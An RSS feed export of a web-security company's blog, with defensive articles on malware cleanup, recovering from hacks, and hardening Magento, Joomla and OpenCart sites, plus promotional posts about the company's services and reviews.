Website Protection – Security Blog https://blog.siteguarding.com Wed, 24 Apr 2024 10:58:37 +0000 en-US hourly 1 https://wordpress.org/?v=6.5 https://blog.siteguarding.com/wp-content/uploads/2016/07/cropped-Logo_sh_last_2_last-32x32.jpg Website Protection – Security Blog https://blog.siteguarding.com 32 32 The Imperative Need to Keep Your Website Free from Blacklists and Viruses: A Comprehensive Guide https://www.siteguarding.com/security-blog/the-imperative-need-to-keep-your-website-free-from-blacklists-and-viruses-a-comprehensive-guide/ Wed, 24 Apr 2024 10:56:16 +0000 https://blog.siteguarding.com/?p=672 Read More]]> 

In the digital age, maintaining a website that is free from blacklists and viruses is not just an option, but a necessity. This article aims to shed light on the importance of keeping your website clean and secure, focusing on the dangers of harmful content and the benefits of using Website Blacklist Removal services.

The digital landscape is fraught with potential dangers, with cyber threats evolving at an alarming rate. One of the most common issues faced by website owners is the presence of harmful content. This can include pages that attempt to deceive visitors into sharing personal information or downloading software that could potentially harm their systems. Such content not only poses a risk to your visitors but also tarnishes your website’s reputation.

The phrase “This site is unsafe” is a chilling warning that no website owner wants to see. This warning is often displayed by web browsers when they detect potentially harmful content on a website. It is a clear indication that your website has been blacklisted, a situation that can lead to a significant decrease in traffic and a potential loss of business.

Understanding the Consequences of Blacklisting

When a website is blacklisted, it is essentially flagged as unsafe by search engines and web security services. This can happen for a variety of reasons, including the presence of malware, phishing attempts, or spammy content. Once a website is blacklisted, it becomes difficult for users to access it, as their browsers will display warnings about the site’s safety.

The impact of blacklisting can be severe. It can lead to a significant drop in website traffic, as potential visitors are deterred by safety warnings. This can, in turn, lead to a loss of business and revenue. Moreover, being blacklisted can also damage your website’s reputation, making it harder to regain the trust of your visitors even after the issue has been resolved.

The Importance of Keeping Your Website Clean

Keeping your website free from harmful content is crucial for several reasons. Firstly, it ensures the safety of your visitors. By ensuring that your website does not contain any pages that try to trick visitors into sharing personal info or downloading software, you are protecting them from potential harm.

Secondly, maintaining a clean website helps to preserve your website’s reputation. A website that is known for being safe and secure is more likely to attract and retain visitors. On the other hand, a website that is known for containing harmful content is likely to be avoided.

Lastly, keeping your website clean can also help to improve its search engine ranking. Search engines like Google prioritize the safety and security of their users. As such, they are more likely to rank websites that are free from harmful content higher in their search results.

The Role of Website Blacklist Removal Services

Given the potential consequences of blacklisting, it is crucial to address the issue as soon as possible. This is where Website Blacklist Removal services come in. These services are designed to help website owners remove their websites from blacklists and restore their reputation.

Website Blacklist Removal services typically involve a comprehensive scan of your website to identify any harmful content or security vulnerabilities. Once these issues have been identified, the service provider will work to resolve them. This can involve removing harmful content, cleaning up any malware infections, and securing your website to prevent future issues.

Moreover, these services also often include assistance with submitting a review request to search engines and web security services. This is a crucial step in the process, as it can help to expedite the removal of your website from blacklists.

In conclusion, keeping your website free from blacklists and viruses is of paramount importance. It not only ensures the safety of your visitors but also helps to preserve your website’s reputation and improve its search engine ranking. By using Website Blacklist Removal services, you can effectively address any issues and ensure that your website remains safe and secure.

]]>
How to Remove Malicious Code, Viruses, and Backdoors from Your Website https://www.siteguarding.com/security-blog/how-to-remove-malicious-code-viruses-and-backdoors-from-your-website/ Wed, 03 Apr 2024 12:48:37 +0000 https://blog.siteguarding.com/?p=666 Read More]]> joomla protection

Malicious code can cause significant damage to your website and business reputation. It can lead to data breaches, loss of customer trust, and even legal issues. Therefore, it’s crucial to regularly scan your website for malicious code and remove it promptly.

In this article, we will discuss how to remove malicious code, viruses, and backdoors from your website. We will cover the following topics:

  1. Understanding Malicious Code, Viruses, and Backdoors
  2. Signs of a Compromised Website
  3. Steps to Remove Malicious Code, Viruses, and Backdoors
  4. Preventing Future Attacks
  5. Conclusion
  6. Understanding Malicious Code, Viruses, and Backdoors

Malicious code refers to any code that is designed to harm a website or server. It can include scripts, iframes, and other types of code that cybercriminals inject into a website to steal data, redirect visitors, or spread malware.

Viruses are a type of malicious code that can replicate itself and infect other files or systems. They can cause significant damage to a website, including data corruption, system crashes, and loss of functionality.

Backdoors are a type of malicious code that provides cybercriminals with unauthorized access to a website or server. They can be used to steal data, modify files, or launch further attacks.

  1. Signs of a Compromised Website

Before you can remove malicious code, viruses, and backdoors from your website, you need to identify whether your website has been compromised. Here are some signs of a compromised website:

  • Unusual traffic patterns, such as a sudden spike or drop in traffic
  • Unexpected changes to your website’s content or design
  • Unauthorized users or accounts in your website’s admin panel
  • Slow website performance or frequent crashes
  • Search engine warnings or blacklisting
  • Customer complaints about unusual behavior or suspicious activity on your website
  1. Steps to Remove Malicious Code, Viruses, and Backdoors

If you suspect that your website has been compromised, follow these steps to remove malicious code, viruses, and backdoors:

Step 1: Backup Your Website

Before you start the cleanup process, backup your website’s files and database. This will ensure that you can restore your website if anything goes wrong during the cleanup process.

Step 2: Identify the Malicious Code

Use a malware scanner to scan your website’s files and database for malicious code. There are many malware scanners available, both free and paid, such as Sucuri, Wordfence, and SiteLock.

Step 3: Remove the Malicious Code

Once you have identified the malicious code, remove it from your website’s files and database. This can be a complex and time-consuming process, especially if the malicious code is embedded in multiple files.

If you are not comfortable removing the malicious code yourself, consider hiring a professional website security service to do it for you.

Step 4: Change Your Passwords

Change all passwords associated with your website, including admin panel passwords, FTP passwords, and database passwords. This will prevent cybercriminals from regaining access to your website.

Step 5: Update Your Website’s Software

Update your website’s software, including CMS, plugins, and themes, to the latest version. This will patch any vulnerabilities that cybercriminals may have exploited to inject the malicious code.

Step 6: Monitor Your Website

Monitor your website for any signs of reinfection. Use a malware scanner to regularly scan your website’s files and database for malicious code.

  1. Preventing Future Attacks

Preventing future attacks is crucial to maintaining your website’s security. Here are some best practices to follow:

  • Keep your website’s software up to date
  • Use strong passwords and change them regularly
  • Limit user access to your website’s admin panel
  • Use a firewall to block malicious traffic
  • Regularly scan your website for malicious code
  • Educate your employees about website security best practices
  • Consider hiring a professional website security service to monitor and protect your website
  1. Conclusion

Removing malicious code, viruses, and backdoors from your website is a complex and time-consuming process. However, it’s crucial to maintaining your website’s security and protecting your business reputation.

By following the steps outlined in this article, you can remove malicious code from your website and prevent future attacks. Remember to regularly scan your website for malicious code, keep your website’s software up to date, and follow website security best practices.

Investing in a professional website security service can also provide peace of mind and ensure that your website is protected against cyber threats.

FAQs

  1. How do I know if my website has been compromised?

Signs of a compromised website include unusual traffic patterns, unexpected changes to your website’s content or design, unauthorized users or accounts in your website’s admin panel, slow website performance or frequent crashes, search engine warnings or blacklisting, and customer complaints about unusual behavior or suspicious activity on your website.

  1. How can I remove malicious code from my website?

To remove malicious code from your website, backup your website’s files and database, identify the malicious code using a malware scanner, remove the malicious code from your website’s files and database, change all passwords associated with your website, update your website’s software to the latest version, and monitor your website for any signs of reinfection.

  1. How can I prevent future attacks on my website?

To prevent future attacks on your website, keep your website’s software up to date, use strong passwords and change them regularly, limit user access to your website’s admin panel, use a firewall to block malicious traffic, regularly scan your website for malicious code, educate your employees about website security best practices, and consider hiring a professional website security service to monitor and protect your website.

  1. Can I remove malicious code from my website myself?

Removing malicious code from your website can be a complex and time-consuming process, especially if the malicious code is embedded in multiple files. If you are not comfortable removing the malicious code yourself, consider hiring a professional website security service to do it for you.

  1. How often should I scan my website for malicious code?

You should scan your website for malicious code regularly, ideally daily. This will help you detect and remove malicious code before it causes significant damage to your website and business reputation.

  1. What is a backdoor in website security?

A backdoor is a type of malicious code that provides cybercriminals with unauthorized access to a website or server. It can be used to steal data, modify files, or launch further attacks.

  1. How can I protect my website from viruses?

To protect your website from viruses, keep your website’s software up to date, use strong passwords and change them regularly, limit user access to your website’s admin panel, use a firewall to block malicious traffic, regularly scan your website for malicious code, educate your employees about website security best practices, and consider hiring a professional website security service to monitor and protect your website.

  1. How can I secure my website’s admin panel?

To secure your website’s admin panel, limit user access to only those who need it, use strong passwords and change them regularly, implement two-factor authentication, and regularly scan your website for malicious code.

  1. What is a malware scanner?

A malware scanner is a tool that scans your website’s files and database for malicious code. It can help you detect and remove malicious code from your website.

  1. How can I recover my website after a malware attack?

To recover your website after a malware attack, backup your website’s files and database, identify the malicious code using a malware scanner, remove the malicious code from your website’s files and database, change all passwords associated with your website, update your website’s software to the latest version, and monitor your website for any signs of reinfection. Consider hiring a professional website security service to assist with the recovery process.

]]>
SiteGuarding CY Ltd. is a Top-Rated Web Development & Security Services Agency! https://www.siteguarding.com/security-blog/top-rated-clutch/ Tue, 28 Jan 2020 11:34:56 +0000 https://blog.siteguarding.com/?p=629 Read More]]> What sets SiteGuarding CY Ltd. apart is that we not only develop cutting-edge websites, but also ensure that they’re protected against unknown unknown viruses and threats. In today’s digital age, we know that a well-developed, aesthetically-pleasing website isn’t enough; as cyber-attacks become more sophisticated and prolific, a website must also be fully secure.

siteguarding

We develop the highest-grade security tools to provide maximum website protection, without exception. With 10+ years of experience and 50+ IT professionals, we’re well-equipped to deliver groundbreaking software solutions. We’ve worked with businesses of all sizes across a variety of industries, delivering a personal approach to every customer and every project.

We’re excited to announce that we recently began partnering with Clutch, a B2B platform and reputable connector of buyers and sellers. We appreciate receiving feedback from clients so that we can continuously improve our processes, and we also know that client reviews are helpful to those interested in our services.

Our most recent review on Clutch came from an office and home solutions company that contracted us to make sure their website complied with the EU’s General Data Protection Regulation (GDPR). We came on board and, upon checking their website, found some core problems with the code. We fixed those issues and made changes to the site to make it quicker and more functional. Our team also helped reduce the amount of spam that the company was receiving.

clutch

We continue to provide 24/7 protection, and the client reports that they’re “completely happy” with our services and the results we’ve delivered. They’re pleased that the website now works well and is even bringing them more leads.

Another 5-star review came from Egroup Services Ltd., a web design, development, and information security company. They didn’t have enough time or expertise to deliver on certain projects, so they hired us as an outsourcing partner.

We’ve contributed to a number of projects for them, and we’ve become their go-to resource for e-commerce development. For example, Egroup needed to build an e-commerce site for a wine company, but they weren’t familiar with their CMS, so we created an independent payment gateway for the site. For another project that was especially complex, we helped create an online app for 3D models of naval ships and architectural designs.

“They’ve done an excellent job—they’re professional and reliable. Our clients are always happy, so we’re happy. I’ve tested their work a few times too, and it’s always solid.” — CEO, Egroup Services Ltd.

clutch.coHaving worked with unreliable freelancers in the past, EGroup reports that our project management capabilities have exceeded expectations. Since they also maintain a high level of tech expertise, they’re pleased to know that we’re delivering quality work to their clients.

We’re thankful to our clients for helping us establish a positive online presence and digital reputation, and we look forward to collecting more reviews on Clutch! If you have any questions about our past work or the services we provide, please don’t hesitate to reach out.

]]>
What to Do if Your Site Has Been Hacked https://www.siteguarding.com/security-blog/if-your-site-has-been-hacked/ Tue, 10 Dec 2019 14:11:17 +0000 https://blog.siteguarding.com/?p=543 Read More]]> Every webmaster at one point or another has to face the fact of their website being hacked. If you haven’t had this kind of problem yet, then you’ve either been using a custom CMS or have just recently started working with sites. In this article, we will go point by point to easily explain what you need to do if your site has been hacked or if malicious code has been inserted into your site.

Relax, it’s not that bad

First of all, you shouldn’t panic or do anything rash. Webmasters frequently turn to immediately restore a backup copy of their site and thereby lose the content that they’ve posted over the preceding days. There’s nothing wrong with doing this, except for one “but”: the site is restored, but the backdoor through which the site was hacked isn’t closed. This means that it is only a matter of time until your site will be hacked again and you’ll have to face the same problem all over again.

There is no need to panic and make rash decisions, you just need to get out of the situation with minimal losses and act so as to ensure that your site will be an impregnable fortress to hackers in the future.

Contact your hosting provider

First and foremost, find out from your hosting provider whether your site could have been hacked because of a server vulnerability. If you use regular hosting and not a dedicated server, then it is by all means possible that the hacking was the fault of your hosting neighbor. In other words, the hacker gained access to one of the client sites on the same server as yours, and thereby gained administrative rights to the whole server. When a hacker gets administrative rights, they can install a virus on any website on the whole server.

Find out from your hosting provider whether the server has software that lets you scan your site for malicious code. Many hosting providers buy antivirus protection for their servers from us so that their clients can check their sites for viruses for free. But in most cases things are still a little different: most of hosting providers either do not use antivirus software at all, or use free versions which are very ineffective.

Tell your hosting provider that you are aware of the virus and are already working on getting rid of it. This is necessary because many hosts, upon seeing a virus on a client site, simply block and disconnect the site from their network. As a result, you might lose clients and search engine positions while your site is unavailable.

Ask your hosting provider if their administrators can help you delete the virus from your site. It is possible that your hosting seller offers such a service which you just don’t know about.

Restore an earlier version of your site

website restore

If you have backed up your site at least once a week, then it should be no problem for you to simply restore a copy of the site from before it had malware injected. This is the easiest way to eliminate a virus and then install additional site protection.

Check your work computer for viruses

According to our statistics, 20% of site hacks occur due to negligence towards the security of one’s work PC or employees’ computers. If you use Windows at your workplace, be sure to install a firewall (WAF – Web Application Firewall) and antivirus. Check your computer and employees’ computers for viruses, and then consider transferring your employees working on the site to Linux or Unix OS.

Change passwords

The most cunning hackers know that as soon as you detect a hack and unauthorized access to your site, the first thing you’ll do is change all your passwords. So they create additional users within the site administration, and sometimes inside the cPanel. Make sure that you do not have new administrators and FTP accounts, and if you do find them, simply delete them.

Templates, modules, and plugins

Go to the administrative section of your CMS and view the installed modules. Delete all the ones you don’t need. Attention!: Don’t simply deactivate them, but delete them from the hosting so that these modules’ files aren’t on your server. Check to see if the plugins you need are updated to the latest versions. If you haven’t updated them in a while, be sure to check with the developer what the latest version is and update them. A lot of Magento Extension Development companies warn you if your website has extensions that are not up to date.

Do the same with your templates. If you only use one version of a template on the site, then delete all the unneeded ones and update the ones you need to their latest version.

Google Webmaster (Search Console)

search console

If you still haven’t installed Google Search Console, then be sure to do so. Check if there aren’t any notifications for you. Both Google and MSN generally send notifications when their algorithms detect a virus on sites. If you have notifications, be sure to contact both after you delete the viruses. Then, submit a request to review your site.

Indexed Pages

Open Google and type in the search bar site:site_name.com. View all the pages in the MSN and Google indexes. If you find any unknown pages, send a request to have them removed through Google or MSN Webmaster.

To quickly block spam pages, you can use the file robots.txt which can be found in the root folder of your site and is available at the address of your_site.com/robots.txt. Open the file in any of your favorite text editors and add the following lines for all robots:

Disallow: /spam.php
Disallow: /hacked/malware.html
Disallow: /malware_folder/

Naturally, instead of the above pages, you should specify the pages you found in the search results.

Here is an example of Japanese spam which is installed on hacked user sites:

Japanese Spam

Find and eliminate viruses on the site

It should be added that simply deleting a malicious code is not enough. You need to find out how your site was hacked and where the vulnerability is on your site, so as to protect yourself from future hacks. Let us draw your attention to the fact that if you have more than one site on a hosting, you need to check all of them for viruses and vulnerabilities. If an attacker gained access to one of your sites, it is likely that a malicious code can also be found hidden in any of the others.

Conclusion

It doesn’t matter which CMS you use or what traffic your site has, you should always devote time to the security of your resources. Ensuring site security is just as complicated and difficult work as is building or promoting a site in search systems. It takes time and energy, but modern reality is such that if you don’t dedicate enough time to securing your server, you will most likely lose time searching for and deleting viruses and restoring sites following a hack.

]]>
Magento vs WordPress: which is the most secure? https://www.siteguarding.com/security-blog/magento-vs-wordpress-which-is-the-most-secure/ Thu, 18 Jan 2018 12:29:33 +0000 https://blog.siteguarding.com/?p=498 Read More]]> Magento is still the most popular ecommerce platform. It’s known as the most trusted platform with a high functionality and customizability level. WordPress is considered the fastest growing CMS currently. Initially, it’s referred to blogs because its main functionality is aimed at easy blog keeping. By the way, its developers have succeeded in turning it into the perfectly well content management system.

Magento or WordPress? This is a question which like many similar ones have no right answer. It depends on which goals you would like to achieve.

If your primary aim is to sell products via online stores, it will be definitely better for you to choose Magento platform. The truth is this Magento 2 Cloud CMS is specially created for trading through the Internet. By the way, if you are not interested in ecommerce and just would like to create and post some amazing contents, WordPress is what you actually need.

WordPress is traditionally famous for its plugins. Besides its own extensions, WordPress is ready to offer multiple third-party plugins. But there is one sad fact. The security of such third parties products is up in the air. And this is the main point you should take into consideration when choosing WordPress for ecommerce.

At the same time, Magento doesn’t need any additional plugins itself. It has the native functionality which is enough for creating secure stores. But as a rule, the owners of major business always try to empower their stores and install different extensions with useful features. By the way, all the Magento plugins meet the highest security requirements.

Security is actually what vendors are worrying about primarily. The first reason is their customers make online payments and they should be ensured their classified information under strong protection. So, what makes Magento the most secure platform for ecommerce?

  • Security patches and timely notification

As Magento security center informs in 2015 they released 7 security patches and two more in 2016. All those who joined to their security alert registry are immediately informed about security updates. So that, vendors are always aware of what else they can do for providing the highest protection of their stores.

  • Free tool for scanning

If you miss some security news or just with a view to prevention you always can scan your Magento website for free. There is a special tool for scanning and detecting vulnerabilities for you to be sure your website is under protection.

  • Availability of multiple security plugins

There is a great number of Magento security extensions. They can estimate limits or block threats, scan vulnerabilities, empower passwords, scan changed files. Some of them can be downloaded from Magento Connect or reliable 3rd party websites.

By the way, you need to be carefully attentive with the Magento 2 extensions and Magento themes. Those of them which are pulled down from the Magento Marketplace/Connect are subject to cyber attack mostly. And it’s also needed to remember about updations and always use updated versions of Magento plugins and Magento templates.

Choosing the perfect option for your business to organize please pay attention to the following fact. Despite WordPress is easy to use, simple to customize and flexible enough, Magento is a key player in the market of ecommerce platforms. The reason is not only its extended functionality which allows creating a store from scratch, the main its advantage is a high level of security.  When it comes to WordPress based websites, they are the most vulnerable for being attacked. There is no reliable protection system compared to Magento which always faces to the payments and personal data storage.

]]>
10+1 Tips How to Improve the Security of Your Magento 2 Store https://www.siteguarding.com/security-blog/101-tips-how-to-improve-the-security-of-your-magento-2-store/ Tue, 31 Oct 2017 05:48:11 +0000 https://blog.siteguarding.com/?p=492 Read More]]> Security is the issue that should never be ignored by online merchants. And Magento 2 stores are not the exception to this rule. In this article, we will give you some useful tips how the security of your Magento 2 store can be improved. So, let’s start.

Update Your Magento 2 to the Latest Version

The Magento team regularly releases updates of its platform by adding new features and improving the old ones, in particular, the security issues. So, check for the latest updates from time to time to provide your web store with the latest protection solutions.

Use Reliable Magento 2 Extensions

The reason why Magento 2 extensions are so popular is that they allow enhancing the basic functionality of this platform. However, before installing any extension, make sure that this extension is provided by a truly reliable developer, not some defrauder. In addition, it’s recommended to download Magento 2 extensions from trustworthy resources, such as the Magento Marketplace site.

Create Encrypted Connection

If the data are transferred through an unencrypted connection, there is the risk that this data can be intercepted. However, this problem can be prevented by configuring secure URLs right in your Magento 2 Admin Panel.

To perform the configuration, go to Stores-Configuration. In the Configuration menu, expand the Web option. In the panel opened, find the Base URL (Secure) section and expand it. Here, you can configure the URLs to establish the encrypted connection.

Use Two-factor Authentication

As a rule, a secure Magento 2 password is not the guarantee of complete website protection from hacker attacks. Consider using two-factor authentication to further improve the security of your Magento 2 store and protect yourself from password-related risks that may appear in the future.

Create Backup Files

Make sure that you have a backup version of all your web store files in case your store is hacked. The possibilities of Magento 2 Cloud Solution allow you to backup the entire database of your site, including the system and media files.

To perform the backup, in your Magento 2 Admin Panel, click on System and choose Backups in the Tools section. In the panel opened, you can manage the backup process of your files. After the configuration is completed, apply changes by clicking on the Save Config button.

Take Care of Your Email Address

Magento 2 automatically configures e-mail addresses through which users can easily recover their passwords. Still, if your email ID was hacked, your Magento 2 store becomes subjected to hacker attacks. So, make sure that the email address given by Magento is not publicly known (change it if needed) and protected with the two-factor authentication.

Limit Admin Access

To ensure that the Admin Panel of your store can be accessed from a particular IP address, just restrict the admin access in your Magento 2 settings. First, click System in your Magento 2 Admin Panel and choose User Roles in the Permissions section. In the panel opened, you can manage user roles in your store by clicking on the Add New Role button and ascribing the corresponding roles for particular user IDs.

Enable Admin Login CAPTCHA

CAPTCHA is the technology that prevents hackers and even bots from accessing the database of your site. You can enable this technology in your Magento 2 Admin Panel.

First, click on Stores in the Admin Panel and choose Configuration in the Settings section. In the Configuration menu opened, expand the Advanced section and choose Admin. On the page opened, expand the CAPTCHA section. Here, you can enable the CAPTCHA feature for your web store and configure its settings. Don’t forget to save the configured settings by clicking on the Save Config button.

Configure Action Log

If you use Magento 2 Commerce Edition, you can track the store admin activity through the Action Log feature. To enable the feature, in your Magento 2 Admin Panel, open Stores and choose Configuration in the Settings section. In the menu opened, expand the Advanced tab and choose Admin.

In the window opened, expand the Admin Actions Logging section. Here, you can configure the Action Log settings. When the configuration is completed, save changes.

Use Security Review Services

Magento security experts can give you useful recommendations on how to increase the protection of your store. Still, their tips do not always help to solve all the issues that you are dealing with. That’s why it’s recommended to use special services for analyzing web sites for potential security breaches at least once a year. By performing such checks, you can decide how the security of your store can be further improved.

Bonus Tip

The Magento 2 community, which always ready to help you with any security issues you face, grows constantly. What’s more important is that community members regularly release security reports related to the latest versions of Magento 2. So, visit Magento Forums to provide yourself with the latest Magento 2 security information!

Conclusion

The protection of a web store from hacker attacks should be the number one priority for Magento 2 store owners. Use the tips given in the article to enforce your site’s protection and leave no chance for hackers that may try to breach your security.

]]>
6 Tips How To Improve Magento Security https://www.siteguarding.com/security-blog/6-tips-how-to-improve-magento-security/ Sat, 07 Oct 2017 21:34:51 +0000 https://blog.siteguarding.com/?p=488 Read More]]> While working with a Magento-based website you will be surprised by the number of built-in security features. But safety is a vital point and additional measures to make your website safer are at the stake. Let’s check what I suggest:

  1. Try to be ahead of Magento security updates. Magento developers are working off their socks to provide merchants with more powerful safety system. They try to consider all possible risks and prevent they happen. As a result new Magento versions are stuffed with features and software to snatch detected security risks.
  2. Don’t be rash! Try to avoid simple passwords included your data birth and others the same. Use random letter and figure combinations and change it regularly from time-to-time. And don’t use the same or a little bit similar passwords for your multiple accounts. This is the best thing that prevents you despite what CMS you apply to each your account doesn’t refer to your store.
  3. If you are happy owner of large business, you need more people engaged into store operation. It considerably increases the risk to be broken. It’s a mistake to provide an access to all administrative staff. It’s more reasonable they use different user accounts.
  4. In the ocean of Magento extensions development companies, try to choose exceptionally checked extensions developers. It’s good to test something new. In general an experiment is the best way to select the most suitable things. But remember that when security is at a stake it’s better to pass by any experiments and choose well-tried products.
  5. You know that bugs (equipment failure, staff mistakes, force majors and etc.) are killing business. In this light you always should have your data backup. The perfect thing when you make more than single backup and regularly take your website data backups. It will play directly into your website restore in case of security break.
  6. Let two-factor authentication become a habit. The random password is good but it doesn’t guarantee experienced hackers detect a well-made password ever. Sending a login code to a mobile device is good and prevalent practice. It provides your store are protected from unauthorized login case.

What other measures may be taken to keep a website protected? I’m looking forward to your personal recommendations! See you soon!

]]>
Why Magento Security is Important https://www.siteguarding.com/security-blog/why-magento-security-is-important/ Wed, 26 Jul 2017 11:13:54 +0000 https://blog.siteguarding.com/?p=455 Read More]]> Content management system Magento was developed in the US in 2007 by the well-known company Varien. The site management system Magento was developed in the US in 2007 by the well-known company Varien. Free CMS Magento is open-source software, developed on the basis ZendFramework and operates on a UNIX operating system. CMS is primarily suitable for developing large online stores. On this platform, there are already over 100,000 online resources in the network all over the world.

Opportunities and features of Magento

Based on a single Magento platform, you can instantly create several Internet resources and manage them at a time, which is very convenient for administration. The catalog system is well structured, there is the possibility of comparing the goods. Free management of prices for goods, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose goods at a discount and sort it according to certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to the html code management; possibility for each product or category to add meta tags description and keywords; for each product you can add the right end in the site address, as well as Magento itself makes XML sitemap to the search engines. Magento provides a multicurrency and currency conversion system. This will become a convenient function for customers, regardless of the country in which they are located.

If you want to run your online store on Magento without using templates, you will need knowledge of HTML markup and CSS styles. However, to work with this CMS, it is best to hire a specialist in this field.

In addition to the platform, free and paid modules are provided that expand the functions of the CMS. All free of charge are recommended to be checked on the test form from the beginning, as many low-quality ones come across. For paid modules free technical support from developers is offered.

So, Magento CMS – a solid and high-quality platform, which is great for creating an online store. In some ways, it can be difficult for an inexperienced user, but its capabilities are much wider than other similar platforms. And if there are no functions in the basic configuration, then you can connect additional modules – at the moment there are more than four thousand different extensions.

Magento Security

The most popular recent version of using a hacked site on Magento is the installation of a spy script that tracks forms and sends the values that they enter to the hacker. So the hacker gets access to the data of bank cards from which customers pay for purchases in the store, as well as personal data of the cardholder. That is, all those values that the buyer enters at the stage of registration of the order.

The script is loaded on any page of the store, but it is active only where sensitive data is entered. Usually, these pages contain in the address fragments “onepage”, “checkout”, “onestep” – ordering pages.
The script extracts data from the fields of the form input, select, textarea, checkbox, forms a message from them and sends them to the attacker’s site through ajax.

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

]]>
How to Harden Joomla Security https://www.siteguarding.com/security-blog/how-to-harden-joomla-security/ Wed, 26 Jul 2017 09:42:18 +0000 https://blog.siteguarding.com/?p=444 Read More]]> The virus is a software product and it does not get to the site by air. The virus is brought to the site after the hacking or the owner (administrator) of the site enters a virus with extensions and system templates. Lets consider the 6 main points of “entry” of viruses on the site.

1. Hacking server hosting provider

Any service hosting provider is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can react to this situation only sequentially, that is, to eliminate the consequences of hacking or attacking.

Protection against hacking of the hosting provider’s service can only be preventative.

Choosing a hosting provider, choose only trusted and top-end services. Note whether the hosting provider is using its data center or rents it. In a reviews of the hosting provider pay attention to the statistics of its downtime and unavailability of sites.

The “defenders” of sites have the first “golden” rule: for each domain (site), you need to create a separate user account. It practically doesn’t work out for Shared Hosting (hosting, where under the same account, you are allowed to create 2-20 sites), but it is quite feasible on VDS-servers. Such separation of sites by accounts, isolates sites from each other and when one site is infected, excludes a similar infection of other sites of the account.

2. Hacking the site through “holes”, the vulnerability of CMS

Any content management system (CMS) eventually becomes vulnerable. Not an exception and CMS Joomla. That is why it’s important for Joomla Security to monitor the system updates and periodically update it with new security releases.

3. Hacking CMS Joomla

Methods hacking CMS are as follows:

– Hacking Web site and download shells and backdoors through various forms of downloads: photos, media files, and other files;
– Introduction of malicious code through spam mailing or through SQL injection;
– Theft of site administrator data (SQL injections, XSS attacks, bruteforce);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and Webmasters’ sites, even the most famous ones, is the direct way to possible infection of the site. Sometimes, such a chain-loading extension, from user to user, leads to massive infection;
– Not recommended and all kinds of “torrent” trackers, offering a free download of a paid extension or template.

4. Hacking the Joomla site with a brute force attack

Bruteforce attack is the selection of the name and password of the site administrator. This loophole is closed by complex administrator passwords and changing the administrator’s name from the “admin” to another one.

5. Website hijacking FTP interception

Working with the site impossible to manage without access to an FTP site directory. FTP protocol is quite accessible and it would be strange if the attackers did not try to use this loophole. To protect yourself from this loophole, you need to use the SFTP protocol, create a separate FTP account for each site and not to store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not deal with the site by yourself and hire freelancers to change design or other work, it is possible a virus code infection.

]]>
How to Secure OpenCart CMS https://www.siteguarding.com/security-blog/how-to-secure-opencart-cms/ Tue, 25 Jul 2017 11:13:25 +0000 https://blog.siteguarding.com/?p=433 Read More]]> OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to immediately take care of the security and protection of your site from hacking by unauthorized persons. In this article, we’ll give you basic tips that will help you to improve the OpenCart Security of your site. First of all, the article is suitable for those who have their own online stores made on the basis of OpenCart, but, on the other hand, the tips are quite universal, so they will be interesting to site owners on other CMS.

1. Hiding the login to the administrative panel

By default, in order to enter the admin panel, usually used the following: your_site/admin. Naturally, the more information the hackers have, the easier it will be for them to hack your site. Therefore, the first recommendation is to change the login address to the admin panel from /admin to another: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first, change the name of the folder “admin” to another; second, make the same replacement in the “config.php” file inside the folder that you renamed; thirdly, sometimes you need to make changes to the “config.php” file in the root folder (check if there is mention of “admin” there).

2. Change the administrator’s login and password

After changing the address to enter the panel it is worth to think about changing the login, which also by default looks like “admin”. It should be noted that this is generally the main login, which is usually used on many CMS, so even if you have a store or site not on OpenCart, I still advise you to immediately change it.

How to do it: go to the admin panel, select “System”, then “Users” and again “Users”. See the line in the login “admin” – go to the settings and change the login to another.

By the way, right there you can change the password – I strongly recommend that you do this by creating a password no shorter than ten characters. If you can not figure it out yourself, use one of the online services for generating passwords, which can be easily found in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that by default is called admin (whose name was changed above) contain important information associated with the database, so it is recommended to change the permissions for these files to “Reading Only”.

How to do it: you can change the rights with any tool that you use to work with files. The easiest way is to change them directly in the hosting control panel.

4. Failure to display errors

As a rule, hacking websites, hackers use different loopholes, and error messages that are displayed on the wrong actions are often very helpful for them. Therefore, I recommend you to refuse displaying these errors.

Here you, most likely, will have a question, but what if you need to look at the mistakes? To do this, you can use the error log file (its name is in the same block in the settings).

You can view it if you go to the root folder of the site, then in system and then in logs.

How to do it: go to the admin panel, point “System”, then “Settings” – and there in the settings open the “Server” tab, at the bottom there will be the “Errors” block, there you should put “No” in “Show errors”.

]]>